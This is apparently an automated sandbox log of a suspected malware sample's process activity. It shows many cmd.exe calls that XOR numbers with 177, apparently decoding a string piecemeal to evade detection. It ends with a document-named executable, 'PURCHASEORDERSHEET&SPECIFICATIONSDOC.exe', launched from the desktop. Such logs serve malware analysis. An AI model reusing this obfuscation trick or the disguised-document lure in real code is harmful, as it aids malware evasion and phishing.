                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:89
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:90
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:91
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:92
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:93
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:94
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:95
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:96
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:97
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:98
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:99
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:100
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:101
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:102
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:103
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "193^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:104
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:105
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:106
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:107
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:108
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:109
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:110
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:111
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:112
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:113
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:114
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:115
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:116
                                                                                                                                                              Start time:09:41:09
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:117
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "133^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:118
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:119
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:120
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:121
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:122
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:123
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:124
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:125
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:126
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:127
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:128
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:129
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:130
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:131
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:132
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:133
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:134
                                                                                                                                                              Start time:09:41:10
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:135
                                                                                                                                                              Start time:09:41:43
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:771'320 bytes
